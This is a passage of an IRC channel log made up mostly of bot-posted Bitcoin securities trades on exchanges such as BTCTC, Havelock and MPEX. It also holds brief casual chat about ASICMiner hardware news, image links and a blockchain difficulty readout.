04:34:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jul 11 04:34:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.043793 = 0.6569 BTC [+] Jul 11 04:34:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.043987 = 0.2199 BTC [+] Jul 11 04:35:00 [BTCTC] [S.DICE-PT] 25 @ 0.002203 = 0.0551 BTC [-] Jul 11 04:35:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.043987 BTC [+] Jul 11 04:35:03 [BTCTC] [S.DICE-PT] 1 @ 0.0022 BTC [-] Jul 11 04:35:06 [BTCTC] [S.DICE-PT] 250 @ 0.002106 = 0.5265 BTC [-] Jul 11 04:35:11 [BTCTC] [ASICMINER-PT] 1 @ 4.381 BTC [-] Jul 11 04:35:13 [BTCTC] [S.DICE-PT] 100 @ 0.002105 = 0.2105 BTC [-] Jul 11 04:35:24 [BTCTC] [ASICMINER-PT] 31 @ 4.38 = 135.78 BTC [-] Jul 11 04:35:28 [BTCTC] [S.DICE-PT] 100 @ 0.002103 = 0.2103 BTC [-] Jul 11 04:35:37 [BTCTC] [ASICMINER-PT] 10 @ 4.38 = 43.8 BTC [-] Jul 11 04:36:03 [BTCTC] [S.DICE-PT] 300 @ 0.002102 = 0.6306 BTC [-] Jul 11 04:36:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.043987 = 0.088 BTC [+] Jul 11 04:36:05 [BTCTC] [ASICMINER-PT] 5 @ 4.38 = 21.9 BTC [-] Jul 11 04:36:08 [BTCTC] [S.DICE-PT] 1 @ 0.0021 BTC [-] Jul 11 04:36:22 [BTCTC] [S.DICE-PT] 150 @ 0.002098 = 0.3147 BTC [-] Jul 11 04:36:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.043987 = 0.132 BTC [+] Jul 11 04:36:29 [BTCTC] [S.DICE-PT] 18 @ 0.002097 = 0.0377 BTC [-] Jul 11 04:36:35 [BTCTC] [S.DICE-PT] 72 @ 0.002103 = 0.1514 BTC [+] Jul 11 04:38:40 [BTCTC] [ASICMINER-PT] 1 @ 4.381 BTC [+] Jul 11 04:39:32 [BTCTC] [ASICMINER-PT] 5 @ 4.38 = 21.9 BTC [-] Jul 11 04:40:33 [BTCTC] [S.DICE-PT] 500 @ 0.00208 = 1.04 BTC [-] Jul 11 04:40:34 [BTCTC] [S.DICE-PT] 50 @ 0.002065 = 0.1033 BTC [-] Jul 11 04:40:36 [BTCTC] [S.DICE-PT] 50 @ 0.00206 = 0.103 BTC [-] Jul 11 04:40:37 [BTCTC] [S.DICE-PT] 50 @ 0.002055 = 0.1028 BTC [-] Jul 11 04:41:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.043987 = 0.1759 BTC [+] Jul 11 04:41:43 [BTCTC] [BASIC-MINING] 3 @ 0.35879 = 1.0764 BTC [+] Jul 11 04:43:19 [BTCTC] [S.DICE-PT] 86 @ 0.00205 = 0.1763 BTC [-] Jul 11 04:43:21 [BTCTC] [S.DICE-PT] 100 @ 0.002045 = 0.2045 BTC [-] Jul 11 04:43:23 [BTCTC] [S.DICE-PT] 100 @ 0.002011 = 0.2011 BTC [-] Jul 11 04:43:24 [BTCTC] [S.DICE-PT] 100 @ 0.00201 = 0.201 BTC [-] Jul 11 04:43:25 [BTCTC] [BASIC-MINING] 197 @ 0.35879 = 70.6816 BTC [+] Jul 11 04:43:27 [BTCTC] [S.DICE-PT] 500 @ 0.002009 = 1.0045 BTC [-] Jul 11 04:43:27 [BTCTC] [S.DICE-PT] 100 @ 0.002006 = 0.2006 BTC [-] Jul 11 04:43:29 [BTCTC] [S.DICE-PT] 100 @ 0.002005 = 0.2005 BTC [-] Jul 11 04:43:30 [BTCTC] [S.DICE-PT] 500 @ 0.002001 = 1.0005 BTC [-] Jul 11 04:43:32 [BTCTC] [S.DICE-PT] 200 @ 0.002 = 0.4 BTC [-] Jul 11 04:43:56 [BTCTC] [BASIC-MINING] 3 @ 0.35879 = 1.0764 BTC [+] Jul 11 04:44:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.043986 BTC [-] Jul 11 04:44:33 [BTCTC] [BASIC-MINING] 3 @ 0.358789 = 1.0764 BTC [-] Jul 11 04:45:39 [BTCTC] [DMS.MINING] 30 @ 0.01772 = 0.5316 BTC [+] Jul 11 04:46:02 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 11 04:47:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.043986 BTC [-] Jul 11 04:48:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.043986 BTC [-] Jul 11 04:48:45 [HAVELOCK] [AM100] 100 @ 0.043599 = 4.3599 BTC [-] Jul 11 04:49:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.043986 BTC [-] Jul 11 04:50:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.043986 = 0.2199 BTC [-] Jul 11 04:50:37 ThickAsThieves: wasnt there supposed to be AM hardware news today? Jul 11 04:50:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.043986 = 0.1759 BTC [-] Jul 11 04:51:05 [BTCTC] [DMS.MINING] 4 @ 0.01774 = 0.071 BTC [+] Jul 11 04:51:07 [BTCTC] [DMS.MINING] 31 @ 0.01774 = 0.5499 BTC [+] Jul 11 04:51:08 [BTCTC] [DMS.MINING] 10 @ 0.017749 = 0.1775 BTC [+] Jul 11 04:52:06 yeah, there seems to only be some chinese sites with new sales details Jul 11 04:52:23 which havent been confirmed but are likely accurate Jul 11 04:52:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.043986 = 0.1759 BTC [-] Jul 11 04:52:51 maybe thurs Jul 11 04:53:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.043203 BTC [-] Jul 11 04:53:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.043202 = 0.648 BTC [-] Jul 11 04:53:42 [BTCTC] [BASIC-MINING] 1 @ 0.34999 BTC [-] Jul 11 04:54:08 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 11 04:56:31 [HAVELOCK] [AM100] 3 @ 0.04320001 = 0.1296 BTC [-] Jul 11 04:56:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.043986 = 0.088 BTC [+] Jul 11 04:58:13 [BTCTC] [BASIC-MINING] 9 @ 0.34999 = 3.1499 BTC [-] Jul 11 04:58:19 [HAVELOCK] [AM100] 2 @ 0.0432 = 0.0864 BTC [-] Jul 11 04:58:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.043986 = 0.2199 BTC [+] Jul 11 04:58:56 [HAVELOCK] [AM100] 5 @ 0.043001 = 0.215 BTC [-] Jul 11 05:00:00 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [+] Jul 11 05:00:01 [BTCTC] [MININGCO.ETF] 3 @ 1.22 = 3.66 BTC [+] Jul 11 05:00:58 [BTCTC] [BASIC-MINING] 3 @ 0.349999 = 1.05 BTC [+] Jul 11 05:01:00 [BTCTC] [BASIC-MINING] 9 @ 0.358789 = 3.2291 BTC [+] Jul 11 05:01:12 i somehow think, there will be less heared from fc and more from rockxie (if at all). he seems to be aproved as head of hardware distribution Jul 11 05:01:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.043986 = 0.2639 BTC [+] Jul 11 05:02:25 [HAVELOCK] [AM100] 141 @ 0.043001 = 6.0631 BTC [-] Jul 11 05:02:39 [BTCTC] [DMS.MINING] 3 @ 0.018661 = 0.056 BTC [+] Jul 11 05:03:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.043986 BTC [+] Jul 11 05:04:06 [BTCTC] [BASIC-MINING] 1 @ 0.358789 BTC [+] Jul 11 05:04:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.043986 = 0.2199 BTC [+] Jul 11 05:05:17 who? Jul 11 05:05:32 [BTCTC] [DMS.PURCHASE] 30 @ 0.048832 = 1.465 BTC [-] Jul 11 05:06:49 rockxie is some kind of AM member/employee/rep Jul 11 05:06:52 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 11 05:07:07 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 11 05:07:09 [HAVELOCK] [AM100] 2 @ 0.043 = 0.086 BTC [-] Jul 11 05:07:15 i think he is the one with new blades for sale in china Jul 11 05:07:20 [HAVELOCK] [AM100] 3 @ 0.0425 = 0.1275 BTC [-] Jul 11 05:07:26 or at least posted pricing Jul 11 05:07:53 [BTCTC] [TAT.ASICMINER] 14 @ 0.043986 = 0.6158 BTC [+] Jul 11 05:07:54 rockxie can be the Gavin while friedcat can be satoshi and stay behind the scenes as the shadowy mysterious figure Jul 11 05:08:04 every success story requires a shadowy mysterious figure Jul 11 05:08:21 and mystique Jul 11 05:10:29 ThickAsThieves: lets hang out in Gainseville Jul 11 05:10:30 GO GATORS Jul 11 05:10:33 lol Jul 11 05:10:34 jkjk Jul 11 05:10:44 [HAVELOCK] [AM100] 2 @ 0.041602 = 0.0832 BTC [-] Jul 11 05:10:55 [HAVELOCK] [AM100] 20 @ 0.0411 = 0.822 BTC [-] Jul 11 05:11:04 [HAVELOCK] [AM100] 80 @ 0.041 = 3.28 BTC [-] Jul 11 05:11:12 [HAVELOCK] [AM100] 3 @ 0.04000001 = 0.12 BTC [-] Jul 11 05:11:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.043986 = 0.132 BTC [+] Jul 11 05:11:24 [HAVELOCK] [AM100] 50 @ 0.04000101 = 2.0001 BTC [+] Jul 11 05:12:14 [BTCTC] [ASICMINER-PT] 2 @ 4.38 = 8.76 BTC [-] Jul 11 05:12:47 my wife is a Gator Jul 11 05:13:29 among other schools Jul 11 05:13:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.043205 = 0.0864 BTC [-] Jul 11 05:15:02 [BTCTC] [PAJKA.BOND] 1 @ 0.055499 BTC [+] Jul 11 05:15:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.043204 = 0.432 BTC [-] Jul 11 05:15:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.043204 BTC [-] Jul 11 05:15:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.043203 = 2.1602 BTC [-] Jul 11 05:15:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.043202 = 0.1728 BTC [-] Jul 11 05:16:26 [BTCTC] [BASIC-MINING] 3 @ 0.355 = 1.065 BTC [-] Jul 11 05:16:27 [HAVELOCK] [AM100] 2 @ 0.043659 = 0.0873 BTC [+] Jul 11 05:17:05 [BTCTC] [BITVPS] 16 @ 0.002099 = 0.0336 BTC [+] Jul 11 05:18:53 [BTCTC] [DMS.SELLING] 100 @ 0.03175 = 3.175 BTC [-] Jul 11 05:18:54 [BTCTC] [DMS.SELLING] 100 @ 0.03199 = 3.199 BTC [+] Jul 11 05:18:56 [BTCTC] [DMS.SELLING] 50 @ 0.0322 = 1.61 BTC [+] Jul 11 05:18:57 [BTCTC] [DMS.SELLING] 75 @ 0.0324 = 2.43 BTC [+] Jul 11 05:18:59 [BTCTC] [DMS.SELLING] 30 @ 0.03268 = 0.9804 BTC [+] Jul 11 05:19:00 [BTCTC] [DMS.SELLING] 25 @ 0.03269 = 0.8173 BTC [+] Jul 11 05:19:40 Confucius say: "Vendor prove to me his new fraud detection app work by scanning his powerpoint presentation. App find more than 100 instances of fraud." Jul 11 05:22:06 [BTCTC] [BASIC-MINING] 22 @ 0.355 = 7.81 BTC [-] Jul 11 05:23:20 [BTCTC] [DMS.PURCHASE] 65 @ 0.048832 = 3.1741 BTC [-] Jul 11 05:23:42 [MPEX] [S.MPOE] 8778 @ 0.00080893 = 7.1008 BTC [-] Jul 11 05:23:48 [MPEX] [S.MPOE] 769 @ 0.00080876 = 0.6219 BTC [-] Jul 11 05:25:44 [BTCTC] [DMS.MINING] 20 @ 0.017211 = 0.3442 BTC [-] Jul 11 05:25:46 [BTCTC] [DMS.MINING] 15 @ 0.017211 = 0.2582 BTC [-] Jul 11 05:25:48 [BTCTC] [DMS.MINING] 28 @ 0.01721 = 0.4819 BTC [-] Jul 11 05:25:49 [BTCTC] [DMS.MINING] 1 @ 0.0172 BTC [-] Jul 11 05:25:51 [BTCTC] [DMS.MINING] 1 @ 0.0172 BTC [-] Jul 11 05:25:51 [BTCTC] [DMS.MINING] 6 @ 0.017001 = 0.102 BTC [-] Jul 11 05:25:52 [BTCTC] [DMS.MINING] 10 @ 0.017 = 0.17 BTC [-] Jul 11 05:25:54 [BTCTC] [DMS.MINING] 3 @ 0.017 = 0.051 BTC [-] Jul 11 05:25:55 [BTCTC] [DMS.MINING] 10 @ 0.017 = 0.17 BTC [-] Jul 11 05:26:42 [BTCTC] [ASICMINER-PT] 1 @ 4.380001 BTC [+] Jul 11 05:26:54 [BTCTC] [DMS.PURCHASE] 165 @ 0.048832 = 8.0573 BTC [-] Jul 11 05:28:20 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003923 = 0.0981 BTC [-] Jul 11 05:28:49 [BTCTC] [ASICMINER-PT] 1 @ 4.380001 BTC [+] Jul 11 05:29:22 [BTCTC] [DMS.SELLING] 100 @ 0.0326 = 3.26 BTC [-] Jul 11 05:29:24 [BTCTC] [DMS.SELLING] 125 @ 0.03269 = 4.0863 BTC [+] Jul 11 05:29:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.043984 = 0.1759 BTC [+] Jul 11 05:29:31 [BTCTC] [DMS.SELLING] 15 @ 0.032879 = 0.4932 BTC [+] Jul 11 05:29:32 [BTCTC] [DMS.SELLING] 60 @ 0.03288 = 1.9728 BTC [+] Jul 11 05:30:23 [BTCTC] [BITVPS] 284 @ 0.001756 = 0.4987 BTC [-] Jul 11 05:30:25 [BTCTC] [BITVPS] 250 @ 0.001755 = 0.4388 BTC [-] Jul 11 05:30:27 [BTCTC] [BITVPS] 500 @ 0.001732 = 0.866 BTC [-] Jul 11 05:31:07 [BTCTC] [DMS.SELLING] 100 @ 0.0333 = 3.33 BTC [+] Jul 11 05:31:14 [BTCTC] [ASICMINER-PT] 1 @ 4.38002 BTC [+] Jul 11 05:31:51 [BTCTC] [DMS.SELLING] 90 @ 0.033299 = 2.9969 BTC [-] Jul 11 05:33:17 [BTCTC] [DMS.MINING] 20 @ 0.016509 = 0.3302 BTC [-] Jul 11 05:33:19 [BTCTC] [DMS.MINING] 10 @ 0.016508 = 0.1651 BTC [-] Jul 11 05:33:21 [BTCTC] [DMS.MINING] 14 @ 0.016508 = 0.2311 BTC [-] Jul 11 05:33:24 [BTCTC] [DMS.MINING] 13 @ 0.0164 = 0.2132 BTC [-] Jul 11 05:33:26 [BTCTC] [DMS.MINING] 30 @ 0.016201 = 0.486 BTC [-] Jul 11 05:33:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.043984 BTC [+] Jul 11 05:33:53 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [-] Jul 11 05:34:06 [BTCTC] [ASICMINER-PT] 2 @ 4.396 = 8.792 BTC [+] Jul 11 05:34:57 [BTCTC] [DMS.SELLING] 1 @ 0.031 BTC [-] Jul 11 05:35:05 [BTCTC] [DMS.PURCHASE] 80 @ 0.048832 = 3.9066 BTC [-] Jul 11 05:35:22 [BTCTC] [DMS.PURCHASE] 155 @ 0.048832 = 7.569 BTC [-] Jul 11 05:36:10 [BTCTC] [LTC-ATF.B2] 20 @ 0.0105 = 0.21 BTC [+] Jul 11 05:37:44 [HAVELOCK] [AM100] 1 @ 0.042899 BTC [-] Jul 11 05:40:31 [BTCTC] [DMS.MINING] 45 @ 0.016201 = 0.729 BTC [-] Jul 11 05:40:39 [BTCTC] [BASIC-MINING] 18 @ 0.35699 = 6.4258 BTC [+] Jul 11 05:41:09 [BTCTC] [DMS.MINING] 18 @ 0.0162 = 0.2916 BTC [-] Jul 11 05:41:21 [BTCTC] [DMS.MINING] 50 @ 0.0162 = 0.81 BTC [-] Jul 11 05:41:28 [BTCTC] [DMS.SELLING] 50 @ 0.03375 = 1.6875 BTC [+] Jul 11 05:41:29 [BTCTC] [DMS.SELLING] 50 @ 0.03398 = 1.699 BTC [+] Jul 11 05:41:31 [BTCTC] [DMS.SELLING] 41 @ 0.033989 = 1.3935 BTC [+] Jul 11 05:42:22 [BTCTC] [BASIC-MINING] 1 @ 0.3568 BTC [-] Jul 11 05:42:24 [BTCTC] [BASIC-MINING] 7 @ 0.38699 = 2.7089 BTC [+] Jul 11 05:44:13 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004599 = 0.023 BTC [+] Jul 11 05:44:59 [BTCTC] [DMS.MINING] 5 @ 0.0164 = 0.082 BTC [+] Jul 11 05:48:07 [BTCTC] [DMS.SELLING] 1 @ 0.0316 BTC [-] Jul 11 05:51:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.043984 BTC [+] Jul 11 05:52:20 [BTCTC] [DMS.MINING] 5 @ 0.016122 = 0.0806 BTC [-] Jul 11 05:52:22 [BTCTC] [DMS.MINING] 20 @ 0.016121 = 0.3224 BTC [-] Jul 11 05:52:24 [BTCTC] [DMS.MINING] 10 @ 0.01612 = 0.1612 BTC [-] Jul 11 05:52:26 [BTCTC] [DMS.MINING] 1 @ 0.016001 BTC [-] Jul 11 05:52:27 [BTCTC] [DMS.MINING] 14 @ 0.016 = 0.224 BTC [-] Jul 11 05:52:54 .bait Jul 11 05:52:58 http://25.media.tumblr.com/tumblr_m9tcr5qEB51qf9ve4o1_400.jpg Jul 11 05:53:14 pg13? Jul 11 05:54:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.043984 = 0.6158 BTC [+] Jul 11 05:56:10 [BTCTC] [BTC-TRADING-PT] 7 @ 0.9657 = 6.7599 BTC [+] Jul 11 05:57:52 [BTCTC] [BTC-TRADING-PT] 6 @ 0.9657 = 5.7942 BTC [+] Jul 11 05:57:56 [BTCTC] [BASIC-MINING] 3 @ 0.385 = 1.155 BTC [-] Jul 11 05:57:57 [BTCTC] [BASIC-MINING] 50 @ 0.385 = 19.25 BTC [-] Jul 11 06:00:48 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 11 06:01:22 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 11 06:02:28 [HAVELOCK] [AM100] 30 @ 0.042 = 1.26 BTC [-] Jul 11 06:02:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.043985 BTC [+] Jul 11 06:03:18 [MPEX] [S.MPOE] 4150 @ 0.00080949 = 3.3594 BTC [+] Jul 11 06:04:33 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [+] Jul 11 06:04:56 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 11 06:05:58 ;;bcstats Jul 11 06:06:00 Current Blocks: 245965 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 2002 blocks | Next Difficulty In About: 1 week, 3 days, 16 hours, 56 minutes, and 28 seconds | Next Difficulty Estimate: 26883171.9739 | Estimated Percent Change: 2.75312 Jul 11 06:06:37 finally. here is a cookie for you, ozbot.. *cookiegief* Jul 11 06:06:50 [BTCTC] [BASIC-MINING] 3 @ 0.385 = 1.155 BTC [-] Jul 11 06:07:42 [BTCTC] [BASIC-MINING] 3 @ 0.3949 = 1.1847 BTC [+] Jul 11 06:07:58 basic goes higher and higher.. Jul 11 06:08:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.043984 = 0.088 BTC [-] Jul 11 06:08:46 [MPEX] [S.MPOE] 2820 @ 0.00080949 = 2.2828 BTC [+] Jul 11 06:08:48 [MPEX] [S.MPOE] 3578 @ 0.00081069 = 2.9006 BTC [+] Jul 11 06:08:58 [BTCTC] [TAT.ASICMINER] 43 @ 0.043984 = 1.8913 BTC [-] Jul 11 06:09:02 [MPEX] [S.MPOE] 15045 @ 0.00081091 = 12.2001 BTC [+] Jul 11 06:09:42 [HAVELOCK] [AM100] 83 @ 0.040501 = 3.3616 BTC [-] Jul 11 06:09:45 [BTCTC] [BFMINES] 3000 @ 0.004 = 12 BTC [+] Jul 11 06:09:56 [HAVELOCK] [AM1] 1 @ 4.65 BTC [-] Jul 11 06:10:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.043985 = 0.2639 BTC [+] Jul 11 06:11:12 [BTCTC] [BTC-BOND] 2 @ 0.00995 = 0.0199 BTC [-] Jul 11 06:11:15 [BTCTC] [BASIC-MINING] 7 @ 0.3949 = 2.7643 BTC [+] Jul 11 06:12:10 [BTCTC] [ASICMINER-PT] 4 @ 4.453999 = 17.816 BTC [+] Jul 11 06:13:05 [BTCTC] [ASICMINER-PT] 1 @ 4.454 BTC [+] Jul 11 06:13:51 [BTCTC] [ASICMINER-PT] 1 @ 4.455 BTC [+] Jul 11 06:13:53 [BTCTC] [ASICMINER-PT] 1 @ 4.455 BTC [+] Jul 11 06:13:54 [BTCTC] [ASICMINER-PT] 2 @ 4.455 = 8.91 BTC [+] Jul 11 06:14:13 [MPEX] [S.MPOE] 731 @ 0.00080876 = 0.5912 BTC [-] Jul 11 06:14:14 [MPEX] [S.MPOE] 10045 @ 0.00080739 = 8.1102 BTC [-] Jul 11 06:14:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004599 BTC [+] Jul 11 06:16:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.043985 = 0.1759 BTC [+] Jul 11 06:16:32 [BTCTC] [ASICMINER-PT] 6 @ 4.456 = 26.736 BTC [+] Jul 11 06:16:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.043985 BTC [+] Jul 11 06:17:00 [BTCTC] [ASICMINER-PT] 14 @ 4.456 = 62.384 BTC [+] Jul 11 06:17:40 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 11 06:17:50 [BTCTC] [DMS.MINING] 25 @ 0.016 = 0.4 BTC [-] Jul 11 06:23:23 [BTCTC] [LTC-ATF.B2] 1 @ 0.010395 BTC [-] Jul 11 06:24:04 [BTCTC] [LTC-ATF.B2] 4 @ 0.0105 = 0.042 BTC [+] Jul 11 06:26:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.043985 = 0.5278 BTC [+] Jul 11 06:27:00 [BTCTC] [LTC-ATF.B2] 25 @ 0.0105 = 0.2625 BTC [+] Jul 11 06:28:10 [BTCTC] [BTC-BOND] 6 @ 0.00995 = 0.0597 BTC [-] Jul 11 06:28:48 [BTCTC] [BTC-BOND] 2 @ 0.00999 = 0.02 BTC [+] Jul 11 06:31:10 [MPEX] [S.MPOE] 1655 @ 0.00081091 = 1.3421 BTC [+] Jul 11 06:31:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.043987 = 0.4399 BTC [+] Jul 11 06:31:13 [MPEX] [S.MPOE] 11200 @ 0.00081518 = 9.13 BTC [+] Jul 11 06:31:14 [MPEX] [S.MPOE] 7400 @ 0.00081646 = 6.0418 BTC [+] Jul 11 06:31:33 [MPEX] [S.MPOE] 7550 @ 0.00081693 = 6.1678 BTC [+] Jul 11 06:32:24 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [+] Jul 11 06:33:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.043987 = 0.2199 BTC [+] Jul 11 06:35:53 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.004599 = 0.0874 BTC [+] Jul 11 06:37:41 [BTCTC] [BASIC-MINING] 10 @ 0.4 = 4 BTC [+] Jul 11 06:37:51 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Jul 11 06:39:15 [BTCTC] [DMS.MINING] 5 @ 0.01648 = 0.0824 BTC [+] Jul 11 06:39:18 [BTCTC] [BFMINES] 300 @ 0.004 = 1.2 BTC [+] Jul 11 06:40:40 [BTCTC] [AMC-PT] 42 @ 0.0025 = 0.105 BTC [+] Jul 11 06:42:08 [BTCTC] [DMS.MINING] 7 @ 0.016499 = 0.1155 BTC [+] Jul 11 06:43:49 http://i.imgur.com/qxqK3.gif Jul 11 06:44:00 [MPEX] [S.MPOE] 5171 @ 0.00081727 = 4.2261 BTC [+] Jul 11 06:44:27 aaand http://i.imgur.com/NPF0rhb.gif Jul 11 06:45:06 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [+] Jul 11 06:48:58 [BTCTC] [AMC-PT] 233 @ 0.0025 = 0.5825 BTC [+] Jul 11 06:49:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.043987 = 0.132 BTC [+] Jul 11 06:53:31 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 11 06:56:35 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jul 11 06:57:56 [HAVELOCK] [AM100] 1 @ 0.0422 BTC [+] Jul 11 06:59:54 [BTCTC] [B.YABMC] 5 @ 0.004605 = 0.023 BTC [+] Jul 11 07:00:19 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 11 07:02:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000986 BTC [+] Jul 11 07:03:45 [BTCTC] [DMS.SELLING] 1 @ 0.0311 BTC [-] Jul 11 07:04:11 [BTCTC] [ASICMINER-PT] 1 @ 4.458 BTC [+] Jul 11 07:04:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.043987 = 0.6598 BTC [+] Jul 11 07:05:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.043988 = 0.132 BTC [+] Jul 11 07:05:26 [BTCTC] [ASICMINER-PT] 1 @ 4.459 BTC [+] Jul 11 07:05:28 [BTCTC] [ASICMINER-PT] 3 @ 4.459 = 13.377 BTC [+] Jul 11 07:05:30 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 11 07:06:46 [BTCTC] [AMC-PT] 123 @ 0.002409 = 0.2963 BTC [-] Jul 11 07:06:47 [BTCTC] [AMC-PT] 25 @ 0.002408 = 0.0602 BTC [-] Jul 11 07:06:49 [BTCTC] [AMC-PT] 70 @ 0.002407 = 0.1685 BTC [-] Jul 11 07:06:50 [BTCTC] [AMC-PT] 25 @ 0.002407 = 0.0602 BTC [-] Jul 11 07:06:52 [BTCTC] [AMC-PT] 25 @ 0.002406 = 0.0602 BTC [-] Jul 11 07:06:54 [BTCTC] [AMC-PT] 2 @ 0.002405 = 0.0048 BTC [-] Jul 11 07:06:55 [BTCTC] [AMC-PT] 25 @ 0.002405 = 0.0601 BTC [-] Jul 11 07:06:57 [BTCTC] [AMC-PT] 25 @ 0.002404 = 0.0601 BTC [-] Jul 11 07:06:58 [BTCTC] [AMC-PT] 25 @ 0.002403 = 0.0601 BTC [-] Jul 11 07:07:00 [BTCTC] [AMC-PT] 25 @ 0.002402 = 0.0601 BTC [-] Jul 11 07:07:01 [BTCTC] [AMC-PT] 4165 @ 0.002401 = 10.0002 BTC [-] Jul 11 07:13:21 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [+] Jul 11 07:17:49 [MPEX] [S.MPOE] 4124 @ 0.00081727 = 3.3704 BTC [+] Jul 11 07:18:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.043501 = 0.435 BTC [-] Jul 11 07:18:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.043501 = 0.087 BTC [-] Jul 11 07:18:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.0435 = 0.174 BTC [-] Jul 11 07:18:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.0433 = 0.2165 BTC [-] Jul 11 07:18:16 [BTCTC] [TAT.ASICMINER] 24 @ 0.043207 = 1.037 BTC [-] Jul 11 07:18:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.043205 = 0.216 BTC [-] Jul 11 07:19:24 [BTCTC] [BITVPS] 284 @ 0.002068 = 0.5873 BTC [+] Jul 11 07:23:10 [BTCTC] [BASIC-MINING] 5 @ 0.381001 = 1.905 BTC [-] Jul 11 07:25:28 [BTCTC] [BASIC-MINING] 1 @ 0.381 BTC [-] Jul 11 07:25:29 [BTCTC] [BTC-BOND] 6 @ 0.00999 = 0.0599 BTC [+] Jul 11 07:25:30 [BTCTC] [BASIC-MINING] 2 @ 0.37 = 0.74 BTC [-] Jul 11 07:25:33 [BTCTC] [BTC-TRADING-PT] 2 @ 0.9 = 1.8 BTC [-] Jul 11 07:25:35 [BTCTC] [BTC-TRADING-PT] 1 @ 0.87 BTC [-] Jul 11 07:25:37 [BTCTC] [BTC-TRADING-PT] 3 @ 0.86 = 2.58 BTC [-] Jul 11 07:25:39 [BTCTC] [BTC-TRADING-PT] 4 @ 0.855 = 3.42 BTC [-] Jul 11 07:25:46 [BTCTC] [BTC-BOND] 11 @ 0.009998 = 0.11 BTC [+] Jul 11 07:32:24 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 11 07:32:27 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [+] Jul 11 07:38:50 [BTCTC] [DMS.SELLING] 1 @ 0.03021 BTC [-] Jul 11 07:42:43 [HAVELOCK] [AM100] 3 @ 0.042499 = 0.1275 BTC [+] Jul 11 07:43:30 [BTCTC] [COGNITIVE] 1 @ 0.349999 BTC [+] Jul 11 07:44:11 [BTCTC] [S.DICE-PT] 1 @ 0.002339 BTC [+] Jul 11 07:47:46 [HAVELOCK] [AM100] 1 @ 0.042499 BTC [+] Jul 11 07:47:50 [HAVELOCK] [AM100] 15 @ 0.041023 = 0.6153 BTC [-] Jul 11 07:47:53 [HAVELOCK] [AM100] 89 @ 0.041023 = 3.651 BTC [-] Jul 11 07:50:01 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.004675 = 0.0187 BTC [+] Jul 11 07:50:07 [HAVELOCK] [AM100] 11 @ 0.041023 = 0.4513 